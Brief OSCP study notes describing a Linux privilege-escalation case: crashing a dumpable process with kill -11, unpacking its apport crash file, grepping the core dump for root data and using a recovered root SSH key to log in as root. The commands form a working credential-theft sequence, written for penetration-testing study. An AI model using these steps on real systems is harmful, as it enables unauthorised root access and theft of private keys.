OSCP Notes
Comment on page

case study 1

prctl(PR_SET_DUMPABLE. 1);
if we kill the program in the middle, we could get the data that it was running by causing a segmentation fault.
i.e) if the program was getting data from root, then we can analyze what the data is even if you are not root.
ps -ef | grep count #to see what pid the program "count" is running
kill -11 PID #causes seg fault
ls -la /var/crash #crash logs are usually stored here
apport-unpack crash_file.crash /tmp/log (directory to save the file) # this will unpack e file
Now go into the you should be able to see the logs inside the CoreDump
grep root CoreDump -a
if this succeeds we could see if there's an ssh key file for root.
do the same process from the above to copy the id_rsa key file locally
chmod 600 root.key
ssh -i root.key root@localhost